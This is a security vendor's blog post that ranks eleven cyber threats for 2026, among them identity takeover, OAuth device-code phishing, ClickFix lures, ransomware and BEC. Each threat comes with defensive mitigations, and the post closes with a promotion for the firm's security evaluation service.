Top cyber threats to prioritize going into 2026

1.  Identity takeover from stolen credentials and tokens

What it looks like: password-spraying, “valid” logins from new geos, session-cookie and refresh-token abuse, access gained without obvious malware. Microsoft reports identity attacks are overwhelmingly password-based and rising, with infostealers feeding credential markets.

Do now: phishing-resistant MFA for all admins and remote access, conditional access with impossible-travel and risk-based blocks, disable legacy auth, shorten session lifetime for high-risk apps, alert on abnormal OAuth consent and token use.

2.  OAuth device-code phishing and “legit flow” phishing

What it looks like: users entering a device code on real Microsoft pages after being contacted out-of-band, then attackers capturing access and refresh tokens; rapid adoption late-year is documented in Microsoft’s MDDR 2025.

Do now: restrict or disable device code flow where feasible, tightly control user app-consent, require admin approval for new OAuth apps, monitor device-code sign-in events and anomalous token refresh, train staff to treat device-code prompts as high risk.

3.  “Copy-paste to fix” social engineering, ClickFix and FileFix

What it looks like: phishing or malvertising drives users to a lure page that convinces them to run a command themselves, then infostealers or RATs deploy.

Do now: block common LOLBins and script abuse with application control and attack-surface-reduction rules, restrict PowerShell and WSH for non-admin users, alert on suspicious command-lines launched from browser context, isolate high-risk web browsing.

4.  Help desk and support-channel compromise, MFA fatigue, SIM swapping

What it looks like: attackers impersonate employees or IT, push-bomb MFA prompts, convince carriers to port numbers, and target contracted IT help desks; Scattered Spider activity explicitly documents these TTPs and recent ransomware use.

Do now: phishing-resistant MFA, number-matching and MFA fatigue protections, hardened help-desk workflows with call-back verification and “no MFA transfer” policy, carrier port-out PINs, strict controls over remote-access tooling and help-desk privileged roles.

5.  Ransomware and data extortion, including theft-only extortion

What it looks like: data theft first, then encryption in some cases, and sometimes no encryption at all; Microsoft reports extortion or ransomware drives a majority of attacks with known motives, and Mandiant documents data-theft extortion without encryption as a recurring pattern in cloud compromises.

Do now: immutable and offline backups with restore testing, egress controls and anomaly detection for bulk exfil, rapid privilege containment playbooks, network segmentation for crown-jewel systems, encrypt and monitor backup infrastructure as a primary target.

6.  Zero-day and n-day exploitation of edge security devices

What it looks like: exploitation of VPNs, firewalls, and other edge appliances that sit internet-facing; Mandiant notes the most frequently exploited vulnerabilities in 2024 IR work hit edge security devices and were often first exploited as zero-days.

Do now:  aggressively patch edge devices on a fixed cadence, remove admin interfaces from the internet, enforce MFA on all remote admin, continuous external attack-surface monitoring, rapid IOC sweeps after any vendor alert.

7.  Cloud and SaaS account compromise leading to mass data theft

What it looks like: phishing and stolen credentials as dominant entry points for cloud incidents, followed by data theft as the primary objective; Mandiant quantifies both the entry vectors and the frequency of data theft in cloud compromises.

Do now: tenant-wide MFA enforcement, conditional access, restrict and monitor service principals, least-privilege for SaaS admins, CASB-style monitoring for bulk downloads and API abuse, rotate secrets and remove unused integrations.

8.  Third-party compromise and enterprise app zero-days

What it looks like: compromise via a vendor, managed service, or enterprise platform flaw; recent breach reporting highlights the blast radius of zero-days in widely deployed enterprise software.

Do now: hard vendor access segmentation, time-bound privileged access, continuous assessment of third-party remote tools, rapid patch SLAs for ERP and line-of-business platforms, contractual incident-notification and logging requirements.

9.  Business email compromise and payment diversion fraud

What it looks like: mailbox takeover, invoice manipulation, MFA bypass, and payroll or wire rerouting; Mandiant explicitly tracks BEC as a financially motivated objective in cloud intrusions. 

Do now: enforce DMARC with reject, disable auto-forward to external domains, out-of-band verification for payment changes, protect finance mailboxes with strongest conditional access and MFA, alert on new inbox rules and unusual OAuth grants.

10.  Insider access and “trusted hire” risk

What it looks like: access obtained through contractor and employee channels; Mandiant reports insider threat spiked as an initial infection vector tied to fraudulent North Korean IT worker placements.

Do now: strengthened hiring identity verification, device attestation for remote workers, privileged access management for all IT roles, strict separation of duties, continuous monitoring of admin actions and data access.

11.  AI-assisted phishing and faster malware development

What it looks like: more convincing lures, rapid variation, automated targeting; Microsoft notes AI is increasing the efficiency of phishing and ransomware operations.

Do now: shift controls from content-based filtering to identity and execution controls, harden authentication and consent flows, deploy behavioral detections for post-compromise actions, run frequent phishing simulations tuned to current attack patterns.

Make a resolution in 2026 to set up a security evaluation with InfoSight to identify your highest-risk exposure paths, validate controls, and get a prioritized remediation plan before attackers do.